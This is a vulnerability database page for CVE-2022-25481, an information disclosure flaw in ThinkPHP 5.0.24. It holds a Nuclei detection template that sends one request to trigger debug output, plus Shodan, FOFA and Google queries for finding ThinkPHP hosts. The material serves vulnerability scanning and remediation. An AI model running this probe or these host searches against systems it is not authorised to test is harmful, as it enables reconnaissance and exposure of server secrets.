Vulners
Lucene search
ThinkPHP 5.0.24 - Information Disclosure
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2022-25481 | 21 Mar 202200:15 | – | attackerkb |
 | ThinkPHP 安全漏洞 | 20 Mar 202200:00 | – | cnnvd |
 | CVE-2022-25481 | 20 Mar 202200:00 | – | cve |
 | CVE-2022-25481 | 20 Mar 202200:00 | – | cvelist |
 | Exposure of Resource to Wrong Sphere in ThinkPHP Framework | 22 Mar 202200:00 | – | github |
 | CVE-2022-25481 | 21 Mar 202200:15 | – | nvd |
 | GHSA-69WP-XWM7-69WM Exposure of Resource to Wrong Sphere in ThinkPHP Framework | 22 Mar 202200:00 | – | osv |
 | Code injection | 21 Mar 202200:15 | – | prion |
 | PT-2022-17318 | 20 Mar 202200:00 | – | ptsecurity |
 | CVE-2022-25481 | 23 May 202501:01 | – | redhatcve |
10
id: CVE-2022-25481
info:
name: ThinkPHP 5.0.24 - Information Disclosure
author: caon
severity: high
description: |
ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
impact: |
An attacker can exploit this vulnerability to gain sensitive information.
remediation: |
Upgrade to a patched version of ThinkPHP or apply the necessary security patches.
reference:
- https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25481
- https://github.com/20142995/sectool
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-25481
cwe-id: CWE-668
epss-score: 0.04748
epss-percentile: 0.90747
cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: thinkphp
product: thinkphp
shodan-query:
- title:"ThinkPHP"
- http.title:"thinkphp"
- cpe:"cpe:2.3:a:thinkphp:thinkphp"
fofa-query:
- title="thinkphp"
- header="think_lang"
google-query: intitle:"thinkphp"
tags: cve,cve2022,thinkphp,exposure,oss,vuln
http:
- method: GET
path:
- '{{BaseURL}}/index.php?s=example'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Exception"
- "REQUEST_TIME"
- "ThinkPHP Constants"
condition: and
- type: status
status:
- 200
- 500
- 404
condition: or
# digest: 490a0046304402206b3264a6295bf2fb63fa1dcc360c44f6771470cf58c34118b26d38e345b8d3e0022037584159de19989fadb1f325ba775990a99007a6eb62574849e81598c13513fe:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.14 - 7.5
EPSS0.04748
SSVC